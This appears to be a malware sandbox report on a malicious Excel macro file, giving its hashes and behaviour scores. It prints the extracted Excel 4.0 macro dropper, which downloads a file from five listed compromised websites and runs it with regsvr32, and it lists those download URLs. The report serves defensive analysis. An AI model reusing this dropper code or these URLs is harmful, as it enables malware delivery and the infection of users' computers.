Overview

overview

10

Static

static

10

a980cc66bc...7.xlsm

windows7-x64

10

a980cc66bc...7.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a980cc66bc8428c6aeb061345e099d6e216b01319ec175d5a60259a63b72ffb7

  • Size

    46KB

  • Sample

    241120-q45ahsskgr

  • MD5

    e40eb135f3d8dda844e02c669c3a841e

  • SHA1

    3ecf00ed4a4b5e4e331d19e64bca7d60123ecd6b

  • SHA256

    a980cc66bc8428c6aeb061345e099d6e216b01319ec175d5a60259a63b72ffb7

  • SHA512

    b560cf834bb9143fb2cbc157e0619591db0a31403751f84e17d975dbd10ce7eeb0431563ff951935a4d71aafa5f4662fbf78eca323c6bf41389da2cfc1f4b7ed

  • SSDEEP

    768:j5WHFKfQzXTmbfRzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UP6UCIHcX:jwF+OXabfFtT5fTR4Lh1NisFYBc3cr+z

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://nataliapereira.com/wp-admin/pE8xYY3x6p/

http://annewelshsalon.com/wp-admin/2c9l2o1/cWWAzTVQ/

http://hellocloudgurusgerald.com/wp-content/iXYx/

https://ramijabali.com/licenses/0/

https://africa-roadworks.com/lilo-bard/vk3GSY7/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://nataliapereira.com/wp-admin/pE8xYY3x6p/","..\dw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://annewelshsalon.com/wp-admin/2c9l2o1/cWWAzTVQ/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hellocloudgurusgerald.com/wp-content/iXYx/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ramijabali.com/licenses/0/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://africa-roadworks.com/lilo-bard/vk3GSY7/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://nataliapereira.com/wp-admin/pE8xYY3x6p/

Targets

    • Target

      a980cc66bc8428c6aeb061345e099d6e216b01319ec175d5a60259a63b72ffb7

    • Size

      46KB

    • MD5

      e40eb135f3d8dda844e02c669c3a841e

    • SHA1

      3ecf00ed4a4b5e4e331d19e64bca7d60123ecd6b

    • SHA256

      a980cc66bc8428c6aeb061345e099d6e216b01319ec175d5a60259a63b72ffb7

    • SHA512

      b560cf834bb9143fb2cbc157e0619591db0a31403751f84e17d975dbd10ce7eeb0431563ff951935a4d71aafa5f4662fbf78eca323c6bf41389da2cfc1f4b7ed

    • SSDEEP

      768:j5WHFKfQzXTmbfRzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UP6UCIHcX:jwF+OXabfFtT5fTR4Lh1NisFYBc3cr+z

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks